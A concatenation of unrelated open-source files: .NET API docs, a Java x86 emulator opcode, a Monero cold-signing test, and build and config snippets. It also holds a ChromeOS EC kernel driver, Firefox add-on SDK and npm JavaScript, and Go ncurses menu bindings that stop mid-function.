<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="RootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
<Parameter Name="Exists" Type="System.String" RefType="out" />
<Parameter Name="SSL" Type="System.String" RefType="out" />
<Parameter Name="WindowsAuth" Type="System.String" RefType="out" />
<Parameter Name="Anonymous" Type="System.String" RefType="out" />
<Parameter Name="HomePage" Type="System.String" RefType="out" />
<Parameter Name="DiscoFile" Type="System.String" RefType="out" />
<Parameter Name="PhysicalPath" Type="System.String" RefType="out" />
<Parameter Name="BaseUrl" Type="System.String" RefType="out" />
<Parameter Name="VirtualRoot" Type="System.String" RefType="out" />
</Parameters>
<Docs>
<param name="RootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<param name="Exists">When this method returns, this parameter contains a <see langword="true" /> if the virtual directory exists; otherwise, <see langword="false" />.</param>
<param name="SSL">When this method returns, this parameter contains a <see langword="true" /> if SSL encryption is required; otherwise, <see langword="false" />.</param>
<param name="WindowsAuth">When this method returns, this parameter contains <see langword="true" /> if Windows authentication is set, otherwise, <see langword="false" />.</param>
<param name="Anonymous">When this method returns, this parameter contains <see langword="true" /> if no authentication is set (anonymous user); otherwise, <see langword="false" />.</param>
<param name="HomePage">When this method returns, this parameter contains a <see langword="true" /> if the Virtual Root's <see langword="EnableDefaultDoc" /> property is set; otherwise, <see langword="false" />.</param>
<param name="DiscoFile">When this method returns, this parameter contains a <see langword="true" /> if a Default.disco file exists; otherwise, <see langword="false" />.</param>
<param name="PhysicalPath">When this method returns, this parameter contains the disk address of the virtual root directory.</param>
<param name="BaseUrl">When this method returns, this parameter contains the base URL.</param>
<param name="VirtualRoot">When this method returns, this parameter contains the name of the virtual root.</param>
<summary>Returns the security status of an existing SOAP virtual root.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
</Members>
</Type>
| {
"pile_set_name": "Github"
} |
/*
JPC: An x86 PC Hardware Emulator for a pure Java Virtual Machine
Copyright (C) 2012-2013 Ian Preston
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Details (including contact information) can be found at:
jpc.sourceforge.net
or the developer website
sourceforge.net/projects/jpc/
End of licence header
*/
package org.jpc.emulator.execution.opcodes.rm;
import org.jpc.emulator.execution.*;
import org.jpc.emulator.execution.decoder.*;
import org.jpc.emulator.processor.*;
import org.jpc.emulator.processor.fpu64.*;
import static org.jpc.emulator.processor.Processor.*;
public class btc_Ew_Gw_mem extends Executable
{
final Pointer op1;
final int op2Index;
public btc_Ew_Gw_mem(int blockStart, int eip, int prefices, PeekableInputStream input)
{
super(blockStart, eip);
int modrm = input.readU8();
op1 = Modrm.getPointer(prefices, modrm, input);
op2Index = Modrm.Gw(modrm);
}
public Branch execute(Processor cpu)
{
Reg op2 = cpu.regs[op2Index];
int bit = 1 << (op2.get16() & (16-1));
int offset = ((op2.get16() & ~(16-1))/8);
cpu.cf = (0 != (op1.get16(cpu, offset) & bit));
cpu.flagStatus &= NCF;
op1.set16(cpu, offset, (short)(op1.get16(cpu, offset)^bit));
return Branch.None;
}
public boolean isBranch()
{
return false;
}
public String toString()
{
return this.getClass().getName();
}
} | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
# Copyright (c) 2019 The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be
# used to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test cold tx signing
"""
from __future__ import print_function
from framework.daemon import Daemon
from framework.wallet import Wallet
class ColdSigningTest():
def run_test(self):
self.reset()
self.create(0)
self.mine()
self.transfer()
def reset(self):
print('Resetting blockchain')
daemon = Daemon()
res = daemon.get_height()
daemon.pop_blocks(res.height - 1)
daemon.flush_txpool()
def create(self, idx):
print('Creating hot and cold wallet')
self.hot_wallet = Wallet(idx = 0)
# close the wallet if any, will throw if none is loaded
try: self.hot_wallet.close_wallet()
except: pass
self.cold_wallet = Wallet(idx = 1)
# close the wallet if any, will throw if none is loaded
try: self.cold_wallet.close_wallet()
except: pass
seed = 'velvet lymph giddy number token physics poetry unquoted nibs useful sabotage limits benches lifestyle eden nitrogen anvil fewest avoid batch vials washing fences goat unquoted'
res = self.cold_wallet.restore_deterministic_wallet(seed = seed)
self.cold_wallet.set_daemon('127.0.0.1:11111', ssl_support = "disabled")
spend_key = self.cold_wallet.query_key("spend_key").key
view_key = self.cold_wallet.query_key("view_key").key
res = self.hot_wallet.generate_from_keys(viewkey = view_key, address = '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm')
ok = False
try: res = self.hot_wallet.query_key("spend_key")
except: ok = True
assert ok
ok = False
try: self.hot_wallet.query_key("mnemonic")
except: ok = True
assert ok
assert self.cold_wallet.query_key("view_key").key == view_key
assert self.cold_wallet.get_address().address == self.hot_wallet.get_address().address
def mine(self):
print("Mining some blocks")
daemon = Daemon()
wallet = Wallet()
daemon.generateblocks('42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 80)
wallet.refresh()
def transfer(self):
daemon = Daemon()
print("Creating transaction in hot wallet")
dst = {'address': '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 'amount': 1000000000000}
self.hot_wallet.refresh()
res = self.hot_wallet.export_outputs()
self.cold_wallet.import_outputs(res.outputs_data_hex)
res = self.cold_wallet.export_key_images(True)
self.hot_wallet.import_key_images(res.signed_key_images, offset = res.offset)
res = self.hot_wallet.transfer([dst], ring_size = 11, get_tx_key = False)
assert len(res.tx_hash) == 32*2
txid = res.tx_hash
assert len(res.tx_key) == 0
assert res.amount > 0
amount = res.amount
assert res.fee > 0
fee = res.fee
assert len(res.tx_blob) == 0
assert len(res.tx_metadata) == 0
assert len(res.multisig_txset) == 0
assert len(res.unsigned_txset) > 0
unsigned_txset = res.unsigned_txset
print('Signing transaction with cold wallet')
res = self.cold_wallet.describe_transfer(unsigned_txset = unsigned_txset)
assert len(res.desc) == 1
desc = res.desc[0]
assert desc.amount_in >= amount + fee
assert desc.amount_out == desc.amount_in - fee
assert desc.ring_size == 11
assert desc.unlock_time == 0
assert desc.payment_id in ['', '0000000000000000']
assert desc.change_amount == desc.amount_in - 1000000000000 - fee
assert desc.change_address == '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm'
assert desc.fee == fee
assert len(desc.recipients) == 1
rec = desc.recipients[0]
assert rec.address == '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm'
assert rec.amount == 1000000000000
res = self.cold_wallet.sign_transfer(unsigned_txset)
assert len(res.signed_txset) > 0
signed_txset = res.signed_txset
assert len(res.tx_hash_list) == 1
txid = res.tx_hash_list[0]
assert len(txid) == 64
print('Submitting transaction with hot wallet')
res = self.hot_wallet.submit_transfer(signed_txset)
assert len(res.tx_hash_list) > 0
assert res.tx_hash_list[0] == txid
res = self.hot_wallet.get_transfers()
assert len([x for x in (res['pending'] if 'pending' in res else []) if x.txid == txid]) == 1
assert len([x for x in (res['out'] if 'out' in res else []) if x.txid == txid]) == 0
daemon.generateblocks('42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 1)
self.hot_wallet.refresh()
res = self.hot_wallet.get_transfers()
assert len([x for x in (res['pending'] if 'pending' in res else []) if x.txid == txid]) == 0
assert len([x for x in (res['out'] if 'out' in res else []) if x.txid == txid]) == 1
res = self.hot_wallet.get_tx_key(txid)
assert len(res.tx_key) == 0 or res.tx_key == '01' + '0' * 62 # identity is used as placeholder
res = self.cold_wallet.get_tx_key(txid)
assert len(res.tx_key) == 64
class Guard:
def __enter__(self):
for i in range(2):
Wallet(idx = i).auto_refresh(False)
def __exit__(self, exc_type, exc_value, traceback):
for i in range(2):
Wallet(idx = i).auto_refresh(True)
if __name__ == '__main__':
with Guard() as guard:
cs = ColdSigningTest().run_test()
| {
"pile_set_name": "Github"
} |
op {
graph_op_name: "ExtractJpegShape"
visibility: HIDDEN
}
| {
"pile_set_name": "Github"
} |
obj-$(CONFIG_CRYPTO_DEV_SUN8I_SS) += sun8i-ss.o
sun8i-ss-y += sun8i-ss-core.o sun8i-ss-cipher.o
| {
"pile_set_name": "Github"
} |
export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_144.jdk/Contents/Home
export BOOK_HOME=/Users/mparsian/zmp/github/data-algorithms-book
export SPARK_HOME=/Users/mparsian/spark-2.2.1
export APP_JAR=$BOOK_HOME/dist/data_algorithms_book.jar
#
# build all other dependent jars in OTHER_JARS
JARS=`find $BOOK_HOME/lib -name '*.jar' `
OTHER_JARS=""
for J in $JARS ; do
OTHER_JARS=$J,$OTHER_JARS
done
#
# define input/output for Hadoop/HDFS
SPAM_TRAINING="file://$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/emails_spam.txt"
NON_SPAM_TRAINING="file://$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/emails_nospam.txt"
MODEL_DIR="$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/model"
MODEL="file://${MODEL_DIR}"
#
# remove all files under input
rm -fr ${MODEL_DIR}
#
# remove all files under output
driver=org.dataalgorithms.machinelearning.logistic.spam.EmailSpamDetectionBuildModel
$SPARK_HOME/bin/spark-submit --class $driver \
--master local \
--jars $OTHER_JARS \
--conf "spark.yarn.jar=$SPARK_JAR" \
$APP_JAR $SPAM_TRAINING $NON_SPAM_TRAINING $MODEL
| {
"pile_set_name": "Github"
} |
<component name="libraryTable">
<library name="ShareSDK-Core-2.5.4">
<CLASSES>
<root url="jar://$PROJECT_DIR$/app/libs/ShareSDK-Core-2.5.4.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component> | {
"pile_set_name": "Github"
} |
/*
* cros_ec_vbc - Expose the vboot context nvram to userspace
*
* Copyright (C) 2015 Collabora Ltd.
*
* based on vendor driver,
*
* Copyright (C) 2012 The Chromium OS Authors
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/of.h>
#include <linux/platform_device.h>
#include <linux/mfd/cros_ec.h>
#include <linux/mfd/cros_ec_commands.h>
#include <linux/slab.h>
static ssize_t vboot_context_read(struct file *filp, struct kobject *kobj,
struct bin_attribute *att, char *buf,
loff_t pos, size_t count)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct cros_ec_device *ecdev = ec->ec_dev;
struct ec_params_vbnvcontext *params;
struct cros_ec_command *msg;
int err;
const size_t para_sz = sizeof(params->op);
const size_t resp_sz = sizeof(struct ec_response_vbnvcontext);
const size_t payload = max(para_sz, resp_sz);
msg = kmalloc(sizeof(*msg) + payload, GFP_KERNEL);
if (!msg)
return -ENOMEM;
/* NB: we only kmalloc()ated enough space for the op field */
params = (struct ec_params_vbnvcontext *)msg->data;
params->op = EC_VBNV_CONTEXT_OP_READ;
msg->version = EC_VER_VBNV_CONTEXT;
msg->command = EC_CMD_VBNV_CONTEXT;
msg->outsize = para_sz;
msg->insize = resp_sz;
err = cros_ec_cmd_xfer(ecdev, msg);
if (err < 0) {
dev_err(dev, "Error sending read request: %d\n", err);
kfree(msg);
return err;
}
memcpy(buf, msg->data, resp_sz);
kfree(msg);
return resp_sz;
}
static ssize_t vboot_context_write(struct file *filp, struct kobject *kobj,
struct bin_attribute *attr, char *buf,
loff_t pos, size_t count)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct cros_ec_device *ecdev = ec->ec_dev;
struct ec_params_vbnvcontext *params;
struct cros_ec_command *msg;
int err;
const size_t para_sz = sizeof(*params);
const size_t data_sz = sizeof(params->block);
/* Only write full values */
if (count != data_sz)
return -EINVAL;
msg = kmalloc(sizeof(*msg) + para_sz, GFP_KERNEL);
if (!msg)
return -ENOMEM;
params = (struct ec_params_vbnvcontext *)msg->data;
params->op = EC_VBNV_CONTEXT_OP_WRITE;
memcpy(params->block, buf, data_sz);
msg->version = EC_VER_VBNV_CONTEXT;
msg->command = EC_CMD_VBNV_CONTEXT;
msg->outsize = para_sz;
msg->insize = 0;
err = cros_ec_cmd_xfer(ecdev, msg);
if (err < 0) {
dev_err(dev, "Error sending write request: %d\n", err);
kfree(msg);
return err;
}
kfree(msg);
return data_sz;
}
static umode_t cros_ec_vbc_is_visible(struct kobject *kobj,
struct bin_attribute *a, int n)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct device_node *np = ec->ec_dev->dev->of_node;
if (IS_ENABLED(CONFIG_OF) && np) {
if (of_property_read_bool(np, "google,has-vbc-nvram"))
return a->attr.mode;
}
return 0;
}
static BIN_ATTR_RW(vboot_context, 16);
static struct bin_attribute *cros_ec_vbc_bin_attrs[] = {
&bin_attr_vboot_context,
NULL
};
struct attribute_group cros_ec_vbc_attr_group = {
.name = "vbc",
.bin_attrs = cros_ec_vbc_bin_attrs,
.is_bin_visible = cros_ec_vbc_is_visible,
};
| {
"pile_set_name": "Github"
} |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
"use strict";
const { windows, isInteractive, isDocumentLoaded,
getOuterId, isTopLevel } = require("../window/utils");
const { InputPort } = require("./system");
const { lift, merges, foldp, keepIf, start, Input } = require("../event/utils");
const { patch } = require("diffpatcher/index");
const { on } = require("../event/core");
const { Sequence, seq, filter, object, pairs } = require("../util/sequence");
// Create lazy iterators from the regular arrays, although
// once https://github.com/mozilla/addon-sdk/pull/1314 lands
// `windows` will be transforme to lazy iterators.
// When iterated over belowe sequences items will represent
// state of windows at the time of iteration.
const opened = seq(function*() {
const items = windows(null, {includePrivates: true});
for (let item of items)
yield [getOuterId(item), item];
});
const interactive = filter(([_, window]) => isInteractive(window), opened);
const loaded = filter(([_, window]) => isDocumentLoaded(window), opened);
// Helper function that converts given argument to a delta.
const Update = window => window && object([getOuterId(window), window]);
const Delete = window => window && object([getOuterId(window), null]);
// Signal represents delta for last opened top level window.
const LastOpened = lift(Update, new InputPort({topic: "domwindowopened"}));
exports.LastOpened = LastOpened;
// Signal represents delta for last top level window close.
const LastClosed = lift(Delete, new InputPort({topic: "domwindowclosed"}));
exports.LastClosed = LastClosed;
const windowFor = document => document && document.defaultView;
// Signal represent delta for last top level window document becoming interactive.
const InteractiveDoc = new InputPort({topic: "chrome-document-interactive"});
const InteractiveWin = lift(windowFor, InteractiveDoc);
const LastInteractive = lift(Update, keepIf(isTopLevel, null, InteractiveWin));
exports.LastInteractive = LastInteractive;
// Signal represent delta for last top level window loaded.
const LoadedDoc = new InputPort({topic: "chrome-document-loaded"});
const LoadedWin = lift(windowFor, LoadedDoc);
const LastLoaded = lift(Update, keepIf(isTopLevel, null, LoadedWin));
exports.LastLoaded = LastLoaded;
const initialize = input => {
if (!input.initialized) {
input.value = object(...input.value);
Input.start(input);
input.initialized = true;
}
};
// Signal represents set of currently opened top level windows, updated
// to new set any time window is opened or closed.
const Opened = foldp(patch, opened, merges([LastOpened, LastClosed]));
Opened[start] = initialize;
exports.Opened = Opened;
// Signal represents set of top level interactive windows, updated any
// time new window becomes interactive or one get's closed.
const Interactive = foldp(patch, interactive, merges([LastInteractive,
LastClosed]));
Interactive[start] = initialize;
exports.Interactive = Interactive;
// Signal represents set of top level loaded window, updated any time
// new window becomes interactive or one get's closed.
const Loaded = foldp(patch, loaded, merges([LastLoaded, LastClosed]));
Loaded[start] = initialize;
exports.Loaded = Loaded;
| {
"pile_set_name": "Github"
} |
'use strict'
var fs = require('graceful-fs')
var path = require('path')
var zlib = require('zlib')
var log = require('npmlog')
var realizePackageSpecifier = require('realize-package-specifier')
var tar = require('tar')
var once = require('once')
var semver = require('semver')
var readPackageTree = require('read-package-tree')
var readPackageJson = require('read-package-json')
var iferr = require('iferr')
var rimraf = require('rimraf')
var clone = require('lodash.clonedeep')
var validate = require('aproba')
var unpipe = require('unpipe')
var normalizePackageData = require('normalize-package-data')
var npm = require('./npm.js')
var mapToRegistry = require('./utils/map-to-registry.js')
var cache = require('./cache.js')
var cachedPackageRoot = require('./cache/cached-package-root.js')
var tempFilename = require('./utils/temp-filename.js')
var getCacheStat = require('./cache/get-stat.js')
var unpack = require('./utils/tar.js').unpack
var pulseTillDone = require('./utils/pulse-till-done.js')
var parseJSON = require('./utils/parse-json.js')
function andLogAndFinish (spec, tracker, done) {
validate('SF', [spec, done])
return function (er, pkg) {
if (er) {
log.silly('fetchPackageMetaData', 'error for ' + spec, er)
if (tracker) tracker.finish()
}
return done(er, pkg)
}
}
module.exports = function fetchPackageMetadata (spec, where, tracker, done) {
if (!done) {
done = tracker || where
tracker = null
if (done === where) where = null
}
if (typeof spec === 'object') {
var dep = spec
spec = dep.raw
}
var logAndFinish = andLogAndFinish(spec, tracker, done)
if (!dep) {
log.silly('fetchPackageMetaData', spec)
return realizePackageSpecifier(spec, where, iferr(logAndFinish, function (dep) {
fetchPackageMetadata(dep, where, tracker, done)
}))
}
if (dep.type === 'version' || dep.type === 'range' || dep.type === 'tag') {
fetchNamedPackageData(dep, addRequestedAndFinish)
} else if (dep.type === 'directory') {
fetchDirectoryPackageData(dep, where, addRequestedAndFinish)
} else {
fetchOtherPackageData(spec, dep, where, addRequestedAndFinish)
}
function addRequestedAndFinish (er, pkg) {
if (pkg) {
pkg._requested = dep
pkg._spec = spec
pkg._where = where
if (!pkg._args) pkg._args = []
pkg._args.push([pkg._spec, pkg._where])
// non-npm registries can and will return unnormalized data, plus
// even the npm registry may have package data normalized with older
// normalization rules. This ensures we get package data in a consistent,
// stable format.
try {
normalizePackageData(pkg)
} catch (ex) {
// don't care
}
}
logAndFinish(er, pkg)
}
}
function fetchOtherPackageData (spec, dep, where, next) {
validate('SOSF', arguments)
log.silly('fetchOtherPackageData', spec)
cache.add(spec, null, where, false, iferr(next, function (pkg) {
var result = clone(pkg)
result._inCache = true
next(null, result)
}))
}
function fetchDirectoryPackageData (dep, where, next) {
validate('OSF', arguments)
log.silly('fetchDirectoryPackageData', dep.name || dep.rawSpec)
readPackageJson(path.join(dep.spec, 'package.json'), false, next)
}
var regCache = {}
function fetchNamedPackageData (dep, next) {
validate('OF', arguments)
log.silly('fetchNamedPackageData', dep.name || dep.rawSpec)
mapToRegistry(dep.name || dep.rawSpec, npm.config, iferr(next, function (url, auth) {
if (regCache[url]) {
pickVersionFromRegistryDocument(clone(regCache[url]))
} else {
npm.registry.get(url, {auth: auth}, pulseTillDone('fetchMetadata', iferr(next, pickVersionFromRegistryDocument)))
}
function returnAndAddMetadata (pkg) {
delete pkg._from
delete pkg._resolved
delete pkg._shasum
next(null, pkg)
}
function pickVersionFromRegistryDocument (pkg) {
if (!regCache[url]) regCache[url] = pkg
var versions = Object.keys(pkg.versions).sort(semver.rcompare)
if (dep.type === 'tag') {
var tagVersion = pkg['dist-tags'][dep.spec]
if (pkg.versions[tagVersion]) return returnAndAddMetadata(pkg.versions[tagVersion])
} else {
var latestVersion = pkg['dist-tags'][npm.config.get('tag')] || versions[0]
// Find the the most recent version less than or equal
// to latestVersion that satisfies our spec
for (var ii = 0; ii < versions.length; ++ii) {
if (semver.gt(versions[ii], latestVersion)) continue
if (semver.satisfies(versions[ii], dep.spec)) {
return returnAndAddMetadata(pkg.versions[versions[ii]])
}
}
// Failing that, try finding the most recent version that matches
// our spec
for (var jj = 0; jj < versions.length; ++jj) {
if (semver.satisfies(versions[jj], dep.spec)) {
return returnAndAddMetadata(pkg.versions[versions[jj]])
}
}
// Failing THAT, if the range was '*' uses latestVersion
if (dep.spec === '*') {
return returnAndAddMetadata(pkg.versions[latestVersion])
}
}
// And failing that, we error out
var targets = versions.length
? 'Valid install targets:\n' + versions.join(', ') + '\n'
: 'No valid targets found.'
var er = new Error('No compatible version found: ' +
dep.raw + '\n' + targets)
return next(er)
}
}))
}
function retryWithCached (pkg, asserter, next) {
if (!pkg._inCache) {
cache.add(pkg._spec, null, pkg._where, false, iferr(next, function (newpkg) {
Object.keys(newpkg).forEach(function (key) {
if (key[0] !== '_') return
pkg[key] = newpkg[key]
})
pkg._inCache = true
return asserter(pkg, next)
}))
}
return !pkg._inCache
}
module.exports.addShrinkwrap = function addShrinkwrap (pkg, next) {
validate('OF', arguments)
if (pkg._shrinkwrap !== undefined) return next(null, pkg)
if (retryWithCached(pkg, addShrinkwrap, next)) return
pkg._shrinkwrap = null
// FIXME: cache the shrinkwrap directly
var pkgname = pkg.name
var ver = pkg.version
var tarball = path.join(cachedPackageRoot({name: pkgname, version: ver}), 'package.tgz')
untarStream(tarball, function (er, untar) {
if (er) {
if (er.code === 'ENOTTARBALL') {
pkg._shrinkwrap = null
return next()
} else {
return next(er)
}
}
if (er) return next(er)
var foundShrinkwrap = false
untar.on('entry', function (entry) {
if (!/^(?:[^\/]+[\/])npm-shrinkwrap.json$/.test(entry.path)) return
log.silly('addShrinkwrap', 'Found shrinkwrap in ' + pkgname + ' ' + entry.path)
foundShrinkwrap = true
var shrinkwrap = ''
entry.on('data', function (chunk) {
shrinkwrap += chunk
})
entry.on('end', function () {
untar.close()
log.silly('addShrinkwrap', 'Completed reading shrinkwrap in ' + pkgname)
try {
pkg._shrinkwrap = parseJSON(shrinkwrap)
} catch (ex) {
var er = new Error('Error parsing ' + pkgname + '@' + ver + "'s npm-shrinkwrap.json: " + ex.message)
er.type = 'ESHRINKWRAP'
return next(er)
}
next(null, pkg)
})
entry.resume()
})
untar.on('end', function () {
if (!foundShrinkwrap) {
pkg._shrinkwrap = null
next(null, pkg)
}
})
})
}
module.exports.addBundled = function addBundled (pkg, next) {
validate('OF', arguments)
if (pkg._bundled !== undefined) return next(null, pkg)
if (!pkg.bundleDependencies) return next(null, pkg)
if (retryWithCached(pkg, addBundled, next)) return
pkg._bundled = null
var pkgname = pkg.name
var ver = pkg.version
var tarball = path.join(cachedPackageRoot({name: pkgname, version: ver}), 'package.tgz')
var target = tempFilename('unpack')
getCacheStat(iferr(next, function (cs) {
log.verbose('addBundled', 'extract', tarball)
unpack(tarball, target, null, null, cs.uid, cs.gid, iferr(next, function () {
log.silly('addBundled', 'read tarball')
readPackageTree(target, function (er, tree) {
log.silly('cleanup', 'remove extracted module')
rimraf(target, function () {
if (tree) {
pkg._bundled = tree.children
}
next(null, pkg)
})
})
}))
}))
}
// FIXME: hasGzipHeader / hasTarHeader / untarStream duplicate a lot
// of code from lib/utils/tar.js– these should be brought together.
function hasGzipHeader (c) {
return c[0] === 0x1F && c[1] === 0x8B && c[2] === 0x08
}
function hasTarHeader (c) {
return c[257] === 0x75 && // tar archives have 7573746172 at position
c[258] === 0x73 && // 257 and 003030 or 202000 at position 262
c[259] === 0x74 &&
c[260] === 0x61 &&
c[261] === 0x72 &&
((c[262] === 0x00 &&
c[263] === 0x30 &&
c[264] === 0x30) ||
(c[262] === 0x20 &&
c[263] === 0x20 &&
c[264] === 0x00))
}
function untarStream (tarball, cb) {
validate('SF', arguments)
cb = once(cb)
var stream
var file = stream = fs.createReadStream(tarball)
var tounpipe = [file]
file.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EREADFILE'
cb(er)
})
file.on('data', function OD (c) {
if (hasGzipHeader(c)) {
doGunzip()
} else if (hasTarHeader(c)) {
doUntar()
} else {
if (file.close) file.close()
if (file.destroy) file.destroy()
var er = new Error('Non-gzip/tarball ' + tarball)
er.code = 'ENOTTARBALL'
return cb(er)
}
file.removeListener('data', OD)
file.emit('data', c)
cb(null, stream)
})
function doGunzip () {
var gunzip = stream.pipe(zlib.createGunzip())
gunzip.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EGUNZIP'
cb(er)
})
tounpipe.push(gunzip)
stream = gunzip
doUntar()
}
function doUntar () {
var untar = stream.pipe(tar.Parse())
untar.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EUNTAR'
cb(er)
})
tounpipe.push(untar)
stream = untar
addClose()
}
function addClose () {
stream.close = function () {
tounpipe.forEach(function (stream) {
unpipe(stream)
})
if (file.close) file.close()
if (file.destroy) file.destroy()
}
}
}
| {
"pile_set_name": "Github"
} |
package menus
// #define _Bool int
// #include <menu.h>
// #cgo LDFLAGS: -lmenu -lncurses
import "C"
import (
. "github.com/mpatraw/gocurse/curses"
"unsafe"
)
type Text C.TEXT
type Item C.ITEM
type Menu C.MENU
type ItemOptions C.Item_Options
type MenuOptions C.Menu_Options
const (
O_ONEVALUE = C.O_ONEVALUE
O_SHOWDESC = C.O_SHOWDESC
O_ROWMAJOR = C.O_ROWMAJOR
O_IGNORECASE = C.O_IGNORECASE
O_SHOWMATCH = C.O_SHOWMATCH
O_NONCYCLIC = C.O_NONCYCLIC
O_SELECTABLE = C.O_SELECTABLE
REQ_LEFT_ITEM = C.REQ_LEFT_ITEM
REQ_RIGHT_ITEM = C.REQ_RIGHT_ITEM
REQ_UP_ITEM = C.REQ_UP_ITEM
REQ_DOWN_ITEM = C.REQ_DOWN_ITEM
REQ_SCR_ULINE = C.REQ_SCR_ULINE
REQ_SCR_DLINE = C.REQ_SCR_DLINE
REQ_SCR_DPAGE = C.REQ_SCR_DPAGE
REQ_SCR_UPAGE = C.REQ_SCR_UPAGE
REQ_FIRST_ITEM = C.REQ_FIRST_ITEM
REQ_LAST_ITEM = C.REQ_LAST_ITEM
REQ_NEXT_ITEM = C.REQ_NEXT_ITEM
REQ_PREV_ITEM = C.REQ_PREV_ITEM
REQ_TOGGLE_ITEM = C.REQ_TOGGLE_ITEM
REQ_CLEAR_PATTERN = C.REQ_CLEAR_PATTERN
REQ_BACK_PATTERN = C.REQ_BACK_PATTERN
REQ_NEXT_MATCH = C.REQ_NEXT_MATCH
REQ_PREV_MATCH = C.REQ_PREV_MATCH
MIN_MENU_COMMAND = C.MIN_MENU_COMMAND
MAX_MENU_COMMAND = C.MAX_MENU_COMMAND
)
type MenusError struct {
message string
}
func (e MenusError) Error() string {
return e.message
}
/*
* Menu functions
*/
func (menu *Menu) CurrentItem() *Item {
return (*Item)(C.current_item((*C.MENU)(menu)))
}
func NewItem(name string, desc string) *Item {
return (*Item)(C.new_item(C.CString(name), C.CString(desc)))
}
func NewMenu(items []*Item) (*Menu, error) {
menu := (*Menu)(C.new_menu((**C.ITEM)(void(&items[0]))))
if menu == nil {
return nil, MenusError{"NewMenu failed"}
}
return menu, nil
}
func (item *Item) Opts() ItemOptions {
return ItemOptions(C.item_opts((*C.ITEM)(item)))
}
func (menu *Menu) Opts() MenuOptions {
return MenuOptions(C.menu_opts((*C.MENU)(menu)))
}
func (item *Item) Description() string {
return C.GoString(C.item_description((*C.ITEM)(item)))
}
func (item *Item) Name() string {
